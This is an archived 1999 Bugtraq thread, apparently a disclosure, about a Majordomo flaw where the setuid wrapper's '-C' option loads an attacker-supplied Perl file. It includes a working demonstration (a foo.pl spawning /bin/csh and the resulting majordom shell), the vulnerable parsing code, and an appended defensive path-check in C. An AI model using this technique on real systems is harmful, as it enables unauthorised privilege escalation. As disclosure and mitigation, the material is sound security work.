[13145] in bugtraq
Re: majordomo local exploit
daemon@ATHENA.MIT.EDU (Olaf Kirch)
Wed Dec 29 22:57:11 1999
Message-Id: <19991229172230.B3278@monad.swb.de>
Date: Wed, 29 Dec 1999 17:22:30 +0100
Reply-To: Olaf Kirch <okir@MONAD.SWB.DE>
From: Olaf Kirch <okir@MONAD.SWB.DE>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <19991229024744.23364.qmail@nwcst292.netaddress.usa.net>; from btellier@USA.NET on Tue, Dec 28, 1999 at 08:47:44PM -0600
While browsing the majordomo lists trying to find out if anyone
is taking care of this issue, I came across another that's in their
archive (appended below).
The comment of Dave Wolfe was that you shouldn't let untrusted users
run programs on his majordomo server.
Olaf
--
Olaf Kirch | --- o --- Nous sommes du soleil we love when we play
okir@monad.swb.de | / | \ sol.dhoop.naytheet.ah kin.ir.samse.qurax
okir@caldera.de +-------------------- Why Not?! -----------------------
UNIX, n.: Spanish manufacturer of fire extinguishers.
Date: Thu, 2 Dec 1999 22:00:48 +0000 (GMT)
From: Shevek <shevek@anarres.org>
To: majordomo-workers@greatcircle.com
Subject: $cf Security flaw
Message-ID: <Pine.LNX.4.10.9912022150430.1186-100000@tirin.openworld.co.uk>
I can get majordomo privileges as a user.
shevek@tirin ~$ cat foo.pl
system("/bin/csh");
shevek@tirin ~$ /usr/local/majordomo/wrapper majordomo -C /home/shevek/foo.pl
%
%whoami
majordom
root@tirin /usr/local/majordomo# ls -ld .
drwxr-x--x 6 majordom daemon 1024 Dec 2 21:49 ./
root@tirin /usr/local/majordomo# ls -l wrapper
-rwsr-xr-x 1 root daemon 6630 Jul 12 11:21 wrapper*
The lines in Majordomo (I found the bug by simple inspection, it's also in
resend)
$cf = $ENV{"MAJORDOMO_CF"} || "/etc/majordomo.cf";
while ($ARGV[0]) {                      # parse for config file or default list
    if ($ARGV[0] =~ /^-C$/i) {          # sendmail v8 clobbers case
        $cf = $ARGV[1];
        shift(@ARGV);
        shift(@ARGV);
    } elsif ($ARGV[0] eq "-l") {
        $deflist = $ARGV[1];
        shift(@ARGV);
        shift(@ARGV);
    } else {
        die "Unknown argument $ARGV[0]\n";
    }
}
if (! -r $cf) {
    die("$cf not readable; stopped");
}
require "$cf";
Am I doing something wrong, or is this a general flaw? Can I simply
disable all the possible methods of setting $cf without breaking other
things? I haven't had time to inspect the system at any length, I just
glanced at it.
I am not on any greatcircle mailing lists, I would appreciate replies to
my own address if there is discussion on this subject.
Majordomo version 1.94.4
Perl 5.005_03
Ta.
S.
--
Shevek
GM/CS/MU -d+ H+>++ s+: !g p2 au0 !a w+++ v-(---) C++++$ UL++++$ UB+
US+++$ UI+++$ P+>++++ L++++$ 3+ E--- N K !W(-----) M(-) !V -po+ Y+
t+ 5++ !j !R G' !tv b+++ D++ B--- e+ u+* h++ f? r-- n---- y?
Recent UH+>++ UO+ UC++ U?+++ UV++ and collecting.
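An added example, not majordomo's code and not part of either message above: a wrapper-side allow-list check for the -C argument, the point at which the setuid wrapper hands an untrusted path to a script that will `require` it. It assumes a trusted config directory of /etc/majordomo/ (an assumption; the page's own default is the single file /etc/majordomo.cf) and is lexical only; a deployed check would also stat() the resolved file and verify its owner and mode so a symlink cannot point back outside the directory.

```c
#include <stdio.h>
#include <string.h>

/* Assumed trusted directory (not a majordomo default). Trailing slash matters:
 * it stops "/etc/majordomox/..." from passing a plain prefix comparison. */
#define TRUSTED_CF_DIR "/etc/majordomo/"

/* Lexically normalise an absolute path: collapse repeated '/', drop "."
 * components, refuse any ".." component. Returns 1 on success, 0 otherwise.
 * out must hold at least strlen(in)+2 bytes. */
static int normalise_abs_path(const char *in, char *out, size_t outsz)
{
    if (in[0] != '/' || strlen(in) + 2 > outsz)
        return 0;
    size_t o = 0;
    const char *p = in;
    while (*p) {
        while (*p == '/')                   /* skip one or more slashes */
            p++;
        const char *start = p;
        while (*p && *p != '/')             /* scan one component */
            p++;
        size_t len = (size_t)(p - start);
        if (len == 0)                       /* trailing slash: nothing more */
            break;
        if (len == 1 && start[0] == '.')    /* "." adds nothing */
            continue;
        if (len == 2 && start[0] == '.' && start[1] == '.')
            return 0;                       /* ".." never allowed */
        out[o++] = '/';
        memcpy(out + o, start, len);
        o += len;
    }
    if (o == 0)
        out[o++] = '/';
    out[o] = '\0';
    return 1;
}

/* Returns 1 if the -C value is a file directly inside TRUSTED_CF_DIR
 * (no subdirectories, no traversal, no relative paths), else 0. */
int config_path_allowed(const char *path)
{
    char norm[4096];
    if (!normalise_abs_path(path, norm, sizeof norm))
        return 0;
    size_t dlen = strlen(TRUSTED_CF_DIR);
    if (strncmp(norm, TRUSTED_CF_DIR, dlen) != 0)
        return 0;
    const char *base = norm + dlen;         /* part after the directory */
    return base[0] != '\0' && strchr(base, '/') == NULL;
}
```

With this in the wrapper, the report's `-C /home/shevek/foo.pl` is refused before the interpreter starts, while `/etc/majordomo/lists.cf` (and sloppy spellings of it such as `/etc/majordomo//./lists.cf`) still pass.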